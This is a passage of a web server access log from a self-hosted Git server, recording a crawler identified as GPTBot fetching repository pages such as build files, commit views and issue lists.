"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fNuget%ec%97%90%20OPC%20UA%20%eb%9d%bc%ec%9d%b4%eb%b8%8c%eb%9f%ac%eb%a6%ac%ec%84%a4%ec%b9%98.md" [Client 74.7.227.38] [Length 23723] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" -[17/Feb/2026:18:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11912] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:18:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt?display=rendered" [Client 74.7.227.38] [Length 11373] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:18:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:18:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71218] [Gzip 17.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:18:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10977] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 37064] [Gzip 14.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:18:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18893] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:18:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70912] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11605] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 70879] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:18:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 72092] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:18:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:18:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71190] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:18:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" -[17/Feb/2026:18:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:18:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11633] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:18:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr 